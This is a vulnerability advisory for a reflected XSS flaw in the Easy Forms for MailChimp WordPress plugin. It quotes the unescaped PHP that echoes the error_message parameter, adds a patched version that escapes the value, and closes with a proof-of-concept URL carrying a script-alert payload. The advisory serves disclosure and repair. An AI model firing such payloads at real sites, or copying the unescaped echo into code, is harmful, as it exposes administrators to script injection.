Easy Forms for MailChimp [Reflected XSS]

Description

Easy Forms for MailChimp is vulnerable to a Reflected XSS attack. The vulnerable code is in the yikes-inc-easy-mailchimp-extender/admin/partials/menu/options.php file, lines 72-82:

// ...
if( isset( $_GET['error_log_created'] ) && $_GET['error_log_created'] == 'true' ) {
    ?>
    <div class="updated">
        <p><?php _e( 'Error log successfully created. You may now start logging errors.', 'yikes-inc-easy-mailchimp-extender' ); ?></p>
    </div>
    <?php
} else if( isset( $_GET['error_log_created'] ) && $_GET['error_log_created'] == 'false' ) {
    ?>
    <div class="error">
        <p><?php _e( urldecode( $_GET['error_message'] ) , 'yikes-inc-easy-mailchimp-extender' ); ?></p>
    </div>
    <?php
}
// ...

If the $_GET['error_log_created'] parameter is set and equal to 'false', the value of $_GET['error_message'] is URL-decoded and passed to _e(), which echoes it into the admin page without proper escaping.
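
One way to close this, shown as an added example (not the plugin's own code or the vendor's patch): escape the message at the point of output. The function names yikes_render_error_log_notice() and yikes_escape_html() are hypothetical, and the htmlspecialchars() fallback is there only so the file also runs outside WordPress.

```php
<?php
// Added example. Function names are hypothetical, not part of the plugin.

function yikes_escape_html( string $text ): string {
    // Inside WordPress use the core escaper; the fallback lets this run stand-alone.
    if ( function_exists( 'esc_html' ) ) {
        return esc_html( $text );
    }
    return htmlspecialchars( $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
}

function yikes_render_error_log_notice( array $query ): string {
    $flag = $query['error_log_created'] ?? null;
    if ( ! is_string( $flag ) ) {
        return ''; // error_log_created[]=x arrives as an array; render nothing
    }
    if ( 'true' === $flag ) {
        return '<div class="updated"><p>Error log successfully created. '
            . 'You may now start logging errors.</p></div>';
    }
    if ( 'false' !== $flag ) {
        return '';
    }
    $message = $query['error_message'] ?? '';
    if ( ! is_string( $message ) ) {
        $message = ''; // same array case for error_message[]=x
    }
    // PHP has already URL-decoded $_GET, so urldecode() is not repeated here.
    // The request value is data, not a translatable string, so it is not
    // passed through _e(); it is HTML-escaped and placed in the markup.
    return '<div class="error"><p>' . yikes_escape_html( $message ) . '</p></div>';
}

// Constructed input: the query string of the PoC on this page, as PHP
// would present it in $_GET.
$sample = array(
    'page'              => 'yikes-inc-easy-mailchimp-settings',
    'error_log_created' => 'false',
    'error_message'     => '<script>alert(/XSS/)</script>',
);

// The angle brackets come out as &lt; and &gt;, so the browser shows the
// payload as text instead of executing it.
echo yikes_render_error_log_notice( $sample ), PHP_EOL;
```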

PoC

http://sbwp4.dev/wp-admin/admin.php?page=yikes-inc-easy-mailchimp-settings&error_log_created=false&error_message=<script>alert(/XSS/)</script>


INFO
GKxtL3WcoJHtnKZtqTuuqPOiMvOwqKWco3AcqUxX